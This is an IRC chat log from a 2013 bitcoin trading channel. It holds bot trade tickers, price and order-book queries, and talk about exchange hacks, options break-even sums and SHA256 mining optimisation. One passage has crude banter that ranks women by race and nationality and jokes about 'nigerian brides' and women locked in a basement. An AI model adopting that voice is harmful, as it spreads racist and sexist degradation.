[BTCTC] [B.YABMC] 1 @ 0.018 BTC [+] Apr 07 04:36:16 [BTCTC] [ASICMINER-PT] 4 @ 0.7824 = 3.1296 BTC [+] Apr 07 04:36:19 [BTCTC] [ASICMINER-PT] 4 @ 0.7824 = 3.1296 BTC [+] Apr 07 04:39:00 [BTCTC] [ASICMINER-PT] 1 @ 0.7701 BTC [-] Apr 07 04:39:02 [BTCTC] [ASICMINER-PT] 1 @ 0.7701 BTC [-] Apr 07 04:49:49 [HAVELOCK] [VTX] 1 @ 0.4375 BTC [-] Apr 07 04:49:51 [HAVELOCK] [VTX] 12 @ 0.429 = 5.148 BTC [-] Apr 07 05:03:21 getting gigabit internet service soon here Apr 07 05:03:42 good for you Apr 07 05:06:49 [HAVELOCK] [KCIM] 3 @ 1.071 = 3.213 BTC [-] Apr 07 05:16:06 [BTCTC] [S.DICE-PT] 30 @ 0.00429 = 0.1287 BTC [+] Apr 07 05:21:54 [BTCTC] [GSDPT] 3 @ 0.003353 = 0.0101 BTC [+] Apr 07 05:27:36 [MPEX] [S.MPOE] 6200 @ 0.00067951 = 4.213 BTC [-] Apr 07 05:27:38 [MPEX] [S.MPOE] 8606 @ 0.00066572 = 5.7292 BTC [-] Apr 07 05:31:29 [BTCTC] [GSDPT] 5 @ 0.003353 = 0.0168 BTC [+] Apr 07 05:57:29 [MPEX] [O.USD.C143T] 600 @ 0.20602864 = 123.6172 BTC Apr 07 06:15:48 [BTCTC] [BTC-BOND] 3 @ 0.009999 = 0.03 BTC [+] Apr 07 06:15:57 [BTCTC] [GSDPT] 20 @ 0.0032 = 0.064 BTC [-] Apr 07 06:17:57 [MPEX] [S.MPOE] 1394 @ 0.00066572 = 0.928 BTC [-] Apr 07 06:21:28 [BTCTC] [BTC-BOND] 7 @ 0.009999 = 0.07 BTC [+] Apr 07 06:21:31 [BTCTC] [BTC-BOND] 195 @ 0.01 = 1.95 BTC [+] **** BEGIN LOGGING AT Sun Apr 7 11:27:30 2013 Apr 07 11:28:00 ;;bids 100 Apr 07 11:28:01 There are currently 53436.112 bitcoins demanded at or over 100.0 USD, worth 6493178.89294 USD in total. | Data vintage: 80.4188 seconds Apr 07 11:28:11 ;;asks 200 Apr 07 11:28:12 There are currently 26949.497 bitcoins offered at or under 200.0 USD, worth 4498414.43946 USD in total. | Data vintage: 91.4832 seconds Apr 07 11:35:16 [BTCTC] [ASICMINER-PT] 1 @ 0.761011 BTC [+] Apr 07 11:35:29 [BTCTC] [ASICMINER-PT] 5 @ 0.76101 = 3.8051 BTC [-] Apr 07 11:37:43 [BTCTC] [ASICMINER-PT] 1 @ 0.75007 BTC [-] Apr 07 11:38:12 [BTCTC] [ASICMINER-PT] 1 @ 0.741 BTC [-] Apr 07 11:38:19 ;;ticker Apr 07 11:38:21 BTCUSD ticker | Best bid: 145.44452, Best ask: 145.45000, Bid-ask spread: 0.00548, Last trade: 145.44452, 24 hour volume: 18564.53534544, 24 hour low: 141.10000, 24 hour high: 145.45000, 24 hour vwap: 143.50361 Apr 07 11:38:32 i hope gox is enjoying the 20k a day volumes lol. Apr 07 11:41:09 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Apr 07 11:43:47 [BTCTC] [ASICMINER-PT] 18 @ 0.739 = 13.302 BTC [-] Apr 07 11:45:56 not sure if it's gox fault or just lack of trading overall Apr 07 11:46:06 it has been very very calm the last days Apr 07 11:46:20 but I guess everything is calm after a 50% rise Apr 07 11:46:48 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Apr 07 11:47:23 and it has been this calm/low volume between the last big breakouts soon, so Apr 07 11:47:33 they'll make up for it Apr 07 11:48:32 but I guess everything is calm after a 50% rise << ahahah Apr 07 11:48:49 mno, the danger after the 50% rise is the 500% rise following. Apr 07 11:51:35 [MPEX] [S.MPOE] 2794 @ 0.00068716 = 1.9199 BTC [-] Apr 07 11:53:17 going for the breakout Apr 07 11:55:58 i'm not sure if its the constant lag or what, btu the excitement of the depth also was really slow, maybe it was just lack of activity in general Apr 07 11:56:49 [MPEX] [S.DICE] 92 @ 0.00301847 = 0.2777 BTC [+] Apr 07 11:56:57 ;;goxlag Apr 07 11:56:58 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 07 11:57:05 ;;ticker Apr 07 11:57:07 BTCUSD ticker | Best bid: 145.70001, Best ask: 145.99999, Bid-ask spread: 0.29998, Last trade: 145.59002, 24 hour volume: 18957.34005147, 24 hour low: 141.10000, 24 hour high: 146.30000, 24 hour vwap: 143.56917 Apr 07 11:58:21 [BTCTC] [GSDPT] 70 @ 0.0034 = 0.238 BTC [+] Apr 07 12:20:41 [BTCTC] [BASIC-MINING] 3 @ 0.39 = 1.17 BTC [+] Apr 07 12:22:05 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Apr 07 12:29:17 ;;ticker Apr 07 12:29:22 BTCUSD ticker | Best bid: 147.00000, Best ask: 147.85000, Bid-ask spread: 0.85000, Last trade: 147.85000, 24 hour volume: 19484.53263950, 24 hour low: 141.10000, 24 hour high: 146.75100, 24 hour vwap: 143.65784 Apr 07 12:35:17 [MPEX] [O.USD.C143T] 1000 @ 0.20696119 = 206.9612 BTC [+] Apr 07 12:46:28 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Apr 07 12:46:46 so apparently vircurex was hacked. Apr 07 12:51:07 ah, and looks like central will resume trading tomorrow Apr 07 12:52:47 yeah. seems indeed they were telling the truth and balances unaffected. Apr 07 12:52:58 but they did lose something with that free wallet thing Apr 07 12:55:37 they are not telling how much Apr 07 12:56:20 but maybe they are insured to a degree by their bank partner Apr 07 12:59:35 online wallets are a bad idea anyway Apr 07 13:00:05 both to provide them as well as to use them Apr 07 13:04:53 yeah on the last part Apr 07 13:04:59 im pretty sure they're not insured on the wallet. Apr 07 13:05:07 ;;eauth mircea_popescu Apr 07 13:05:08 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Apr 07 13:05:48 ;;everify freenode:#bitcoin-otc:58a353388cb9a0606e43d0bf489ed36b29bb910345d158127b7504e8 Apr 07 13:05:50 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Apr 07 13:05:56 ;;unrate kumala Apr 07 13:05:57 Successfully removed your rating for kumala. Apr 07 13:07:59 [BTCTC] [BITVPS] 1 @ 0.00131 BTC [-] Apr 07 13:10:11 https://bitcointalk.org/index.php?topic=165500.0;all Apr 07 13:10:14 that shit;'s so funny Apr 07 13:10:24 [BTCTC] [PAJKA.BOND] 1 @ 0.106 BTC [+] Apr 07 13:12:01 [BTCTC] [BITVPS] 1 @ 0.00131 BTC [-] Apr 07 13:13:59 ath on a saturday? Apr 07 13:14:03 what day is it? Apr 07 13:14:17 hell its sunday here Apr 07 13:15:58 mircea_popescu: has someone opened a scamtag thread for that guy? Apr 07 13:16:05 every time i come here its daed? everyone buy out silk road or something? Apr 07 13:16:13 Diablo-D3 which one, coinjedi ? Apr 07 13:16:24 whoever runs that betting site Apr 07 13:16:28 d3 you saw matthew is no longer a scammer? lol Apr 07 13:16:35 yeah, the very thread is dedicated to scamtagging the site owner and luke Apr 07 13:16:41 coinjed or something Apr 07 13:17:06 oh it is in the scammer subforum Apr 07 13:17:09 why is luke getting tagged in that drama? Apr 07 13:17:20 what did he do? Apr 07 13:17:22 ChaangNoi: because he works for BFL now Apr 07 13:17:25 [BTCTC] [S.MPOE-PT] 5 @ 0.000649 = 0.0032 BTC [+] Apr 07 13:17:30 oh Apr 07 13:17:33 ChaangNoi well... shilling Apr 07 13:17:38 he's not very good at it either. Apr 07 13:17:39 hmm Apr 07 13:17:44 mircea_popescu: well apparently they're paying him in units Apr 07 13:17:46 neither is inaba Apr 07 13:17:52 thus he doesnt qualify as a shill Apr 07 13:17:53 no one at bfl does anything well that i can tell Apr 07 13:17:56 hes an employee. Apr 07 13:17:56 ;;asks 150 Apr 07 13:17:59 There are currently 5227.766 bitcoins offered at or under 150.0 USD, worth 780813.315661 USD in total. | Data vintage: 0.0012 seconds Apr 07 13:18:10 lmao "paying him in units" Apr 07 13:18:12 this sunday rally is shocking... Apr 07 13:18:15 jesus incredible how stupid people can be Apr 07 13:18:33 ChaangNoi heh. people think they have things figured out. Apr 07 13:18:38 as it turns out, they never do. Apr 07 13:18:48 :) Apr 07 13:18:50 mircea_popescu: luke basically admitted it Apr 07 13:19:05 so w/e Apr 07 13:19:12 but it's ridiculious lol. what units. Apr 07 13:19:20 well thats the thing Apr 07 13:19:25 no units are ever going to exist Apr 07 13:19:27 149 is an ath right? Apr 07 13:19:31 so I wonder what luke think hes going to get Apr 07 13:19:37 if you're gonna shill for scammers, at least don't : a. be as stupid as gigavps, shilling for pirate and being paid in "reputation" Apr 07 13:19:42 been traveling Apr 07 13:19:50 b. be as stupid as lukejr, shilling for bfl being paid in "units" Apr 07 13:19:57 get paid in cash. btc, that's what it's for. Apr 07 13:20:03 man Apr 07 13:20:06 or btc... Apr 07 13:20:07 maybe I can get people to shill for me Apr 07 13:20:19 ill shill for btc Apr 07 13:20:25 heh. Apr 07 13:20:25 Ill pay them in rack space at the DMC DC. Apr 07 13:20:42 Diablo-D3 probably should start a nigerian bride service Apr 07 13:20:46 i shill ltc, that seemed to work out so far, lol Apr 07 13:20:48 pay the dorks in nigerian brides. Apr 07 13:21:04 nigerian/? lol Apr 07 13:21:13 why nigerian? Apr 07 13:21:15 ill send you 100's of s.e.a. girls Apr 07 13:21:29 Diablo-D3 i dunno i just picked something Apr 07 13:21:35 hot thai girl is worth 50 very hot nigerians Apr 07 13:21:50 ChaangNoi black chicks have bigger tits Apr 07 13:21:57 mircea_popescu: oh yes they do Apr 07 13:21:59 true Apr 07 13:22:08 i dunno, it was random, could have said cambodian Apr 07 13:22:11 just want to smother yourself in them Apr 07 13:22:12 im not a huge tit guy however Apr 07 13:22:12 some guys are Apr 07 13:22:21 Im a medium tit guy. Apr 07 13:22:26 huge tits come with large ass... Apr 07 13:22:30 anything bigger than D is just what. Apr 07 13:22:36 just for you then, medium tit guy : http://24.media.tumblr.com/tumblr_ls6yiwUk9S1qbj7slo1_500.jpg Apr 07 13:22:37 im very much a small ass guy so i deal with normal sized tits Apr 07 13:22:46 now see, the best part of a woamn Apr 07 13:22:48 the hips Apr 07 13:22:59 not hard to find Cs here Apr 07 13:23:31 i like big tits, but i would say Cs count. Apr 07 13:24:48 mircea_popescu: man, whatever happened to women with wide hips Apr 07 13:24:52 like, the ones from the 60s Apr 07 13:25:19 [MPEX] [O.USD.C143T] 715 @ 0.20885915 = 149.3343 BTC [+] Apr 07 13:25:30 they're all locked in my basement. Apr 07 13:25:52 [BTCTC] [COGNITIVE] 10 @ 0.1499 = 1.499 BTC [+] Apr 07 13:25:55 well thats not very fair Apr 07 13:26:26 [MPEX] [S.MPOE] 100 @ 0.00065754 = 0.0658 BTC [-] Apr 07 13:26:44 ha! shush commie. Apr 07 13:26:52 https://bitcointalk.org/index.php?topic=130947.msg1758226#msg1758226 Apr 07 13:27:00 eskimo bob loses 99.x% of NAV Apr 07 13:27:07 pretty funnay. Apr 07 13:27:15 WOAH Apr 07 13:27:18 eskimobob is back? Apr 07 13:28:05 well, he had that genius plan of buying kilns in ltc Apr 07 13:28:12 ltc he bought kilns with was 0.02 Apr 07 13:28:17 ltc now is 4.x Apr 07 13:28:34 suprisingly enough, the value of a kiln hasn't moved much in the interval Apr 07 13:28:42 or, for that matter, since about 5400 BC. Apr 07 13:31:39 a kiln? Apr 07 13:31:46 as in, a oven you bake pottery in? Apr 07 13:33:23 a very hot oven Apr 07 13:34:22 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Apr 07 13:34:24 ouch Apr 07 13:34:28 should have built it himself from stones and mud Apr 07 13:34:56 maybe he'll get some volunteers too, such things are deemed cool Apr 07 13:34:56 [BTCTC] [ASICMINER-PT] 2 @ 0.739 = 1.478 BTC [-] Apr 07 13:35:59 ohmfg 14000 waiting in the gox line???? Apr 07 13:36:00 fuck me Apr 07 13:36:26 that is why we have an ath on a sunday Apr 07 13:37:00 who wants to buy some calls on my behalf? Apr 07 13:37:06 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Apr 07 13:37:27 what is the price of a 225 call? Apr 07 13:38:15 where? there is no such thing on mpex yet Apr 07 13:38:42 damn Apr 07 13:38:43 lol, had too look up just to check mp didn't add them Apr 07 13:38:53 what is the highest call? Apr 07 13:39:13 200 Apr 07 13:39:26 happen to have the price on hand? Apr 07 13:39:36 iv never used his site Apr 07 13:39:37 u can go to mpex.co? Apr 07 13:39:42 yeah i will Apr 07 13:40:10 !ticker m O.USD.C200T Apr 07 13:40:11 [MPEX:O.USD.C200T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0.05079251 / 0.05079251 / 0.05079251 (200 shares, 10.16 BTC) Apr 07 13:40:34 !depth m O.USD.C200T Apr 07 13:40:40 $depth O.USD.C200T Apr 07 13:40:41 jurov: O.USD.C200T Bids: ['1000 @ 2e-08'] Apr 07 13:40:42 jurov: Asks: ['1000 @ 0.0821222'] Apr 07 13:40:49 yup here we go Apr 07 13:42:05 lol the bidprice is so telling Apr 07 13:42:15 cya later Apr 07 13:42:26 lol im not sure what im even looking at, and i used to trade gold options Apr 07 13:48:54 [MPEX] [S.DICE] 60 @ 0.00301847 = 0.1811 BTC [+] Apr 07 13:50:04 Diablo-D3 yes. exacrtly. Apr 07 13:50:18 mircea_popescu: for what? Apr 07 13:50:41 for burning pottery with his burned out pothead friends ? Apr 07 13:50:44 i have no idea. Apr 07 13:51:17 ChaangNo_ you pay .082122etc btc for the dollar value of 1 btc over 200 Apr 07 13:54:57 ahh Apr 07 13:55:08 thats why i did not get it, you had fiat in there Apr 07 13:55:44 so about $16 a contract Apr 07 13:55:53 (assuming $200) Apr 07 13:56:08 i don't follow. Apr 07 13:56:11 so like $219ish to break even just doing the maths in my head Apr 07 13:56:30 ;;calc 200 / (1 - .82) Apr 07 13:56:31 1111.11111111 Apr 07 13:56:32 what does the price need to be for me to break even at that price? Apr 07 13:56:34 um Apr 07 13:56:36 ;;calc 200 / (1 - .082) Apr 07 13:56:37 217.864923747 Apr 07 13:56:40 217.8 Apr 07 13:56:51 okay so i was a bit off, but close for doing it in my head Apr 07 13:57:04 yeh Apr 07 13:57:12 hmm, yeah we might get that but ill pass, Apr 07 13:57:13 real easy to calc, strike / (1 - premium) for calls Apr 07 13:57:19 strike / (1 + premium) for puts Apr 07 13:57:23 oh it expires the 27th? Apr 07 13:57:27 yes. Apr 07 13:57:28 hmmm Apr 07 13:57:56 okay ill buy a handful if anyone will do it for me, as i dont have an account Apr 07 13:58:32 you can open a coinbr.com one Apr 07 13:58:56 i wont tonight, but might tomorrow Apr 07 13:59:23 too much to do :/ if the price is about the same i might do it tomorrow Apr 07 14:00:34 well if it's not you might do it the day after Apr 07 14:00:38 not like they're going anywhere Apr 07 14:02:50 yeah, i will look into it, iv been traveling and dead tired Apr 07 14:02:55 and have ot go out again soon Apr 07 14:03:02 tomorrow ill have some downtime i hope Apr 07 14:03:32 [BTCTC] [S.MPOE-PT] 16 @ 0.000649 = 0.0104 BTC [+] Apr 07 14:03:42 the 14,000 in the gox line is such a bullish sign, as is new ATH on a sunday Apr 07 14:10:05 [MPEX] [O.USD.C140T] 400 @ 0.21982575 = 87.9303 BTC Apr 07 14:14:45 ;;calc 9140/ (1-.2198) Apr 07 14:14:45 11714.9448859 Apr 07 14:15:01 ;;calc 140/ (1-.2198) Apr 07 14:15:01 179.441168931 Apr 07 14:15:06 hmm Apr 07 14:16:19 [BTCTC] [ASICMINER-PT] 1 @ 0.7779 BTC [+] Apr 07 14:34:23 so here's a basic improvement to current asic hardware : you only need to compute the 2nd hash digit if the 1st came out as 0 Apr 07 14:34:36 if it didn't... you skip to increasing the nonce. Apr 07 14:34:47 it's mind boggling to me that nobody has so far implemented this. Apr 07 14:38:39 mircea_popescu: I dont think you understand how the hash is computed Apr 07 14:38:51 possibly. enlighten me ? Apr 07 14:38:52 and the check is only done in the end, the difference is trivial Apr 07 14:39:01 ping Diablo-D3 Apr 07 14:39:02 why would you compute the whole thing ? Apr 07 14:39:29 it's trivial if you're thinking software. as far as the chip goes, it has to be actually etched on the chip. Apr 07 14:40:00 Scrat: what. Apr 07 14:40:16 the hash block size is the minimum divisible entity in the hash afaik, it's the smallest unit that you can compute Apr 07 14:40:17 oh Apr 07 14:40:25 mircea_popescu: GPU kernels ALREADY only check the first number, H Apr 07 14:40:44 Diablo-D3 i was talking asics Apr 07 14:40:50 asics can do the same thing Apr 07 14:40:53 they just dont Apr 07 14:40:56 CAN being the key word. Apr 07 14:41:01 Diablo-D3: check vs compute Apr 07 14:41:03 big difference Apr 07 14:41:06 Scrat: well Apr 07 14:41:07 is exactly what i'm saying. could push up energy effuiciency what, 50% Apr 07 14:41:09 the problem with asics are Apr 07 14:41:12 you waste ROOM not time Apr 07 14:41:18 mircea_popescu: oh no, not at all Apr 07 14:41:19 you waste power too Apr 07 14:41:25 to do it unoptimized, you do 128 rounds Apr 07 14:41:29 to do it optimized, you do ~112 Apr 07 14:41:34 hm Apr 07 14:41:41 you only get 10% ? Apr 07 14:41:45 basically. Apr 07 14:41:51 usure better optimisation wouldn't give you a ~68 ? Apr 07 14:42:02 uh, you need to learn how mining works bro Apr 07 14:42:22 prolly. Apr 07 14:43:08 mircea_popescu: people have done static analysis on the process already Apr 07 14:43:14 and ? Apr 07 14:43:27 you cant save much because its a crypto hash. Apr 07 14:43:31 it really is as secure as they say it is Apr 07 14:43:50 still, research in this field is very valuable Apr 07 14:43:57 as it will be our first line of warning to hash weakness Apr 07 14:44:04 the fact that asicvendors can optimise towards 50% Apr 07 14:44:18 ;;ticker Apr 07 14:44:19 you skip some steps at the start because its identical for that set of 2**32 nonces (its precomputed on the cpu and you send the state variables to the kenrel/asic/whatever) Apr 07 14:44:20 BTCUSD ticker | Best bid: 149.90000, Best ask: 149.97999, Bid-ask spread: 0.07999, Last trade: 149.90000, 24 hour volume: 26217.06280203, 24 hour low: 141.10000, 24 hour high: 149.00000, 24 hour vwap: 145.13057 Apr 07 14:44:25 nice Apr 07 14:44:38 150 on a sunday? i hope so Apr 07 14:44:38 you skip the last few steps because you only need H Apr 07 14:44:43 and H is finished first Apr 07 14:44:54 (then G, F, E, D, C, B, A) Apr 07 14:45:14 mircea_popescu: you cant optimize it usefully Apr 07 14:45:17 Diablo-D3: so you skip the final permutation step because you can check for the first few bytes Apr 07 14:45:27 Scrat: the last few steps yes Apr 07 14:45:29 but is it really 128 vs 112? Apr 07 14:45:33 its roughly 112 Apr 07 14:46:27 at the start you can precompute parts of several rounds but still have to perform the rounds Apr 07 14:46:35 Diablo-D3 im just saying, suppose somebody somehow DOES manage to optimise it. Apr 07 14:46:43 mircea_popescu: btw, basically what you're describing is an attack on SHA256 Apr 07 14:46:49 i'm aware. Apr 07 14:46:50 which doesn't exist, theoretically or otherwise Apr 07 14:47:01 doesn't mean shouldn't be worked on. by us, preferably. Apr 07 14:47:08 Diablo-D3: is the gain 10%? because you're adding quite a few jumps Apr 07 14:47:27 Scrat: I made more gains out of DiabloMiner doing OTHER tricks Apr 07 14:47:44 Scrat: the precomputed parts of the beginning allow me to do more in parallel for example Apr 07 14:47:57 on asics its going to be less of an importance Apr 07 14:48:31 btw, if they're using a sea of rolled cores, they can already terminate the last 7 rounds Apr 07 14:48:36 they just dont do them Apr 07 14:48:37 walls down bitches Apr 07 14:48:40 ;;asks 150 Apr 07 14:48:40 There are currently 609.96465 bitcoins offered at or under 150.0 USD, worth 91494.697263 USD in total. | Data vintage: 107.2627 seconds Apr 07 14:49:15 indeed Apr 07 14:49:21 ;;goxlag Apr 07 14:49:21 Scrat: I spent about 5 days straight, 16 hours a day, optimizing DM's current kenrel Apr 07 14:49:22 MtGox lag is 12.944595 seconds. During this time, light travels 0.0259408234451 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 07 14:49:33 ;;asks 151 Apr 07 14:49:33 There are currently 599.86303 bitcoins offered at or under 151.0 USD, worth 90105.2013641 USD in total. | Data vintage: 33.9313 seconds Apr 07 14:49:35 Scrat: it was not fun. it was not easy. Apr 07 14:49:39 muhahaha 200 here we come Apr 07 14:49:45 it's getting nearly impressive Apr 07 14:49:49 ;;asks 155 Apr 07 14:49:50 There are currently 1579.7787 bitcoins offered at or under 155.0 USD, worth 240784.985216 USD in total. | Data vintage: 50.6103 seconds Apr 07 14:49:50 :) Apr 07 14:50:17 [MPEX] [O.USD.C140T] 1000 @ 0.22189328 = 221.8933 BTC [+] Apr 07 14:50:17 we hit 154 Apr 07 14:50:18 [MPEX] [O.USD.C143T] 1000 @ 0.21093758 = 210.9376 BTC [+] Apr 07 14:50:25 on a sunday Apr 07 14:50:32 [MPEX] [O.USD.C149T] 1000 @ 0.19075632 = 190.7563 BTC Apr 07 14:50:33 Scrat: I even wrote a SSA compiler in perl that optimizes for parallel execution that you feed it opencl and get opencl Apr 07 14:50:33 [MPEX] [O.USD.C146T] 1000 @ 0.20058142 = 200.5814 BTC Apr 07 14:50:35 Diablo-D3: yeah, significant gains other than that would imply a weakening of sha256 Apr 07 14:50:43 exactly Apr 07 14:50:49 $avg ^oix Apr 07 14:50:49 hell, we're already shaving off 64 rounds Apr 07 14:50:56 hmac sha256 on 80 bytes does 192 rounds Apr 07 14:51:21 $vwap ^oix Apr 07 14:51:22 mircea_popescu: ^OIX 1 day: no data 7 day: average: 119.71467145 high: 153.05972645 low: 104.18044961 volume: 29193 btc: 11933.4892166 30 day: no data Apr 07 14:51:35 we do the first 64 on the cpu, precompute everything we can for the second 64, and then skip the last 7 steps of the last 64 Apr 07 14:51:38 NOW Apr 07 14:51:38 NOW Apr 07 14:51:39 on asics Apr 07 14:51:43 if you're doing rolled cores Apr 07 14:51:54 you CANNOT precompute any part of the beginning Apr 07 14:51:58 because that takes more room on the chip Apr 07 14:52:03 it's nice to see the bid price on Call options rising Apr 07 14:52:23 and you want the cores as small and as stupid as possible so you can pack more onto the chip Apr 07 14:52:29 what costs money is NOT electricity Apr 07 14:52:35 its chip density Apr 07 14:52:50 each chip is very expensive to produce, it needs tso hash as fast as possible Apr 07 14:53:01 ANYTHING that makes it slower, no matter if its technically an optimization or not, is verboten Apr 07 14:53:24 ;;ticker Apr 07 14:53:25 BTCUSD ticker | Best bid: 152.55000, Best ask: 153.00000, Bid-ask spread: 0.45000, Last trade: 152.55000, 24 hour volume: 29167.67662843, 24 hour low: 141.10000, 24 hour high: 154.00000, 24 hour vwap: 145.70414 Apr 07 14:53:47 ASIC optimization is not like GPU optimization Apr 07 14:53:59 in GPUs we dont decide how the chip is laid out so we try to make th ebest use of it Apr 07 14:54:04 on ASICs, we decide the layout Apr 07 14:58:18 ;;asks 160 Apr 07 14:58:19 There are currently 2447.8068 bitcoins offered at or under 160.0 USD, worth 385530.858307 USD in total. | Data vintage: 68.6515 seconds Apr 07 14:58:32 ;;asks 175 Apr 07 14:58:33 There are currently 9233.7121 bitcoins offered at or under 175.0 USD, worth 1535430.41877 USD in total. | Data vintage: 82.7095 seconds Apr 07 14:59:01 pretty sure more than 1.5 million usd will hit the market next week Apr 07 15:07:02 WTS G.SDICE,G.MPOE,G.BBET and BTCQuick! Apr 07 15:07:14 ;;ticker Apr 07 15:07:15 BTCUSD ticker | Best bid: 153.00000, Best ask: 153.58998, Bid-ask spread: 0.58998, Last trade: 153.58999, 24 hour volume: 30061.67247586, 24 hour low: 141.10000, 24 hour high: 154.00000, 24 hour vwap: 145.95625 Apr 07 15:07:18 mornin! Apr 07 15:07:34 154 on a sunday, heh Apr 07 15:07:39 ChaangNo_: you can bet your ass on it, my friend is number 13630 in the verification queue lol Apr 07 15:07:39 yeah no kidding Apr 07 15:07:47 @mtgox Apr 07 15:07:54 that should tell you enough Apr 07 15:07:55 ''bids Apr 07 15:07:58 we could see 225 easy this week Apr 07 15:08:00 ;;bids 0 Apr 07 15:08:00 There are currently 31169744 bitcoins demanded at or over 0.0 USD, worth 11568570.0482 USD in total. | Data vintage: 114.3914 seconds Apr 07 15:08:15 ;;asks 225 Apr 07 15:08:17 There are currently 20470.759 bitcoins offered at or under 225.0 USD, worth 3665049.412 USD in total. | Data vintage: 0.0017 seconds Apr 07 15:08:23 thats at least several thousand people wanting to wire huge amounts of money Apr 07 15:08:38 ;;asks 159 Apr 07 15:08:38 There are currently 1744.9707 bitcoins offered at or under 159.0 USD, worth 272416.846437 USD in total. | Data vintage: 21.3470 seconds Apr 07 15:08:55 ;;asks 165 Apr 07 15:08:55 There are currently 4250.6917 bitcoins offered at or under 165.0 USD, worth 678554.100851 USD in total. | Data vintage: 37.7185 seconds Apr 07 15:12:01 not even 1 m usd to 165 lol Apr 07 15:12:05 well im off to dinner peace Apr 07 15:13:08 $avg Apr 07 15:13:10 ThickAsThieves: 144.11 Apr 07 15:13:56 [BTCTC] [S.MPOE-PT] 5 @ 0.000649 = 0.0032 BTC [+] Apr 07 15:15:18 ;;nethash Apr 07 15:15:19 59095.4517665 Apr 07 15:15:23 ;;estimate Apr 07 15:15:24 Next difficulty estimate | 9035656.70557 based on data since last change | 8255413.27355 based on data for last three days Apr 07 15:15:33 ;;bc.stats Apr 07 15:15:34 Error: "bc.stats" is not a valid command. Apr 07 15:15:37 ;;bc,stats Apr 07 15:15:40 Current Blocks: 230120 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1719 blocks | Next Difficulty In About: 1 week, 3 days, 5 hours, 34 minutes, and 17 seconds | Next Difficulty Estimate: 9035656.70557 | Estimated Percent Change: 17.75911 Apr 07 15:18:41 [BTCTC] [S.MPOE-PT] 3 @ 0.000601 = 0.0018 BTC [-] Apr 07 15:19:42 [BTCTC] [S.MPOE-PT] 1 @ 0.000601 BTC [-] Apr 07 15:21:42 155 Apr 07 15:22:14 ;;asks 159 Apr 07 15:22:14 There are currently 2082.1976 bitcoins offered at or under 159.0 USD, worth 323973.73347 USD in total. | Data vintage: 57.7730 seconds Apr 07 15:22:45 ;;goxlag Apr 07 15:22:46 MtGox lag is 67.013025 seconds. During this time, light travels 0.134293351785 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 07 15:23:50 [BTCTC] [S.MPOE-PT] 1 @ 0.000601 BTC [-] Apr 07 15:25:00 [MPEX] [O.USD.C122T] 15 @ 0.30377875 = 4.5567 BTC [+] Apr 07 15:25:09 [BTCTC] [S.MPOE-PT] 10 @ 0.000649 = 0.0065 BTC [+] Apr 07 15:26:02 [BTCTC] [S.MPOE-PT] 10 @ 0.000601 = 0.006 BTC [-] Apr 07 15:30:26 156 Apr 07 15:30:46 157 Apr 07 15:31:26 [BTCTC] [S.MPOE-PT] 1 @ 0.000649 BTC [+] Apr 07 15:31:29 ;;goxlag Apr 07 15:31:29 MtGox lag is 107.523063 seconds. During this time, light travels 0.215475014364 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 07 15:31:36 ;;ticker Apr 07 15:31:40 BTCUSD ticker | Best bid: 155.00000, Best ask: 156.94419, Bid-ask spread: 1.94419, Last trade: 155.00000, 24 hour volume: 31538.74456478, 24 hour low: 141.10000, 24 hour high: 154.00000, 24 hour vwap: 146.28584 **** BEGIN LOGGING AT Sun Apr 7 15:41:56 2013 Apr 07 15:47:28 [BTCTC] [BTC-GOLD] 4 @ 0.01 = 0.04 BTC [+] Apr 07 15:51:04 [BTCTC] [S.DICE-PT] 1 @ 0.0044 BTC [+] Apr 07 15:54:33 [BTCTC] [ASICMINER-PT] 2 @ 0.777 = 1.554 BTC [-] Apr 07 15:54:37 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [-] Apr 07 16:05:39 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 07 16:15:11 hi all Apr 07 16:15:31 ;;bc,24hprc Apr 07 16:15:32 145.30 Apr 07 16:15:43 ;;ticker Apr 07 16:15:44 BTCUSD ticker | Best bid: 155.00000, Best ask: 155.19999, Bid-ask spread: 0.19999, Last trade: 155.00000, 24 hour volume: 33890.45484523, 24 hour low: 141.10000, 24 hour high: 157.00000, 24 hour vwap: 147.00146 Apr 07 16:16:12 volume is super low Apr 07 16:16:49 ;;bids 0 Apr 07 16:16:50 There are currently 31163186 bitcoins demanded at or over 0.0 USD, worth 11546304.8383 USD in total. | Data vintage: 54.2963 seconds Apr 07 16:22:31 [BTCTC] [COGNITIVE] 1 @ 0.14 BTC [-] Apr 07 16:29:30 http://blog.nus.edu.sg/lsm2251student/files/2010/04/24017-004-98EF07A1.jpg not bitcoin related but fucking awesome Apr 07 16:30:53 [BTCTC] [COGNITIVE] 1 @ 0.138 BTC [-] Apr 07 16:32:06 don't like figs. like em less now Apr 07 16:33:34 [MPEX] [S.DICE] 3 @ 0.00301847 = 0.0091 BTC [+] Apr 07 16:35:37 !ticker m s.dice Apr 07 16:35:39 [MPEX:S.DICE] 1D: 0.00276111 / 0.00320012 / 0.003333 (11015 shares, 35.25 BTC), 7D: 0.00276111 / 0.00320957 / 0.00419788 (538525 shares, 1,728.44 BTC), 30D: 0.00276111 / 0.00364711 / 0.006 (1631973 shares, 5,951.99 BTC) Apr 07 16:35:48 mircea_popescu: are the bots losses big yet? Apr 07 16:41:53 [BTCTC] [COGNITIVE] 1 @ 0.1499 BTC [+] Apr 07 16:44:47 lol Apr 07 16:44:51 bots are probably that bad yet, I think there have been a fair amount of buys that haven't broke even yet. Apr 